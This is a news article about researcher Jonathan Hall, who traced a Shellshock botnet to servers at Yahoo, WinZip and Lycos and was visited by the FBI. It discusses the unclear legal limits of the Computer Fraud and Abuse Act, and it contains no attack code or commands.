FBI Pays Visit to Researcher Who Revealed Yahoo Hack

Jonathan Hall was trying to help the internet. Earlier this week, the 29-year-old hacker and security consultant revealed that someone had broken into machines running inside several widely used internet services, including Yahoo, WinZip, and Lycos. But he may have gone too far. Hall—the president of a security firm called Future South Technologies—went out of […]
Jonathan Hall
Jonathan HallJonathan Hall

[Illustration: Ross Patton/WIRED

Jonathan Hall was trying to help the internet. Earlier this week, the 29-year-old hacker and security consultant revealed that someone had broken into machines running inside several widely used internet services, including Yahoo, WinZip, and Lycos. But he may have gone too far.

Hall---the president of a security firm called Future South Technologies---went out of his way to spotlight a network of compromised computer servers that, he says, are controlled by Romanian hackers. He published his findings on his blog, saying he simply wanted to help these companies clean up a nasty computer problem. But with his aggressive investigation, he may have run afoul of the nation's anti-hacking law, the Computer Fraud and Abuse Act, or CFAA.

"I might wake up tomorrow in handcuffs," says Hall, who was visited by the FBI on Tuesday.

His uncertainty is an example of the general unease in the computer security community caused by aggressive government prosecutions under the CFAA. Enacted in 1986, the law makes it illegal to access a computer without authorization, but security researchers and federal prosecutors often don't agree on what that means. Several high-profile hacking cases have played out in this gray area. Andrew "Weev" Auernheimer and Daniel Spitler were charged after writing a script that accessed information on a publicly available AT&T website, Aaron Swartz for downloading a cache of articles that he was permitted to access.

In Hall's case, he went a little farther. He says he gained access to a server belonging to compression software maker WinZip and issued a command on the machine that displayed the contents of malicious file on his own monitor. After that, he ran a "kill" command on WinZip's server that terminated the malicious program.

"It was trying to find an active working worm that was already in circulation," he says. "That brought me to a valid active botnet that was already in use."

The Honey Pot

His story began late last week, after he set up what's known as a "honey pot," a computer---which he could monitor---that appeared to be vulnerable to the recently disclosed Shellshock bug. Hall's server got attacked, but the attack was coming from an unlikely place, a server that belonged to WinZip.

After a bit of detective work, Hall found the vulnerable server and gained access to it, leveraging the Shellshock vulnerability. He discovered that the server was part of a network of computers, all connecting back to an internet relay chat, or IRC, server that was operated by two Romanian hackers.

By Saturday night, Hall's budding interest in the internet bug known as Shellshock was becoming a sleepless obsession. He kept digging deeper and deeper, discovering other computers that connected to the IRC server, including machines that belonged to Yahoo, Lycos Internet, and other companies. On Monday, Yahoo confirmed that it had been compromised, although Hall and Yahoo disagree on the exact nature of the compromise. Hall says that it was due to Shellshock; Yahoo says not.

Hall says examining and then killing the malicious code was a kind of justified trespass, much like removing a child from an overheating car. But others are not so sure. "It's kind of hard to argue that being a public server, they've authorized you to kill processes," says Robert Graham, the CEO of Errata Security, "but on the other hand this law is pretty vague."

Where is the Line?

Graham himself wrote a script that scanned the internet for servers that were vulnerable to the Shellshock bug. He was doing this for research purposes, querying publicly available servers, but on the face of it, the work he did was a lot like the work that landed Auernheimer and Spitler in the sights of federal prosecutors.

Is an ad network that runs a pop-up JavaScript program on your browser actually authorized to run that code? Maybe not, Graham says. "Where that line is drawn is really hard for us to say," he says.

The FBI showed up at Hall's New Orleans house on Tueday, wanting to ask about the research he'd done. To a certain extent, that's to be expected. Hall says he copied the FBI on his original email notifying Yahoo of its problems. But it isn't his first run-in with authorities. A decade ago, Hall was charged with doing the technical work in a DDoS for hire operation. He says he had nothing to do with those denial of service attacks, and the charges were eventually dropped.

"I don't know what they're going to do," he says of the FBI's Tuesday visit. "It was an awkward kind of conversation."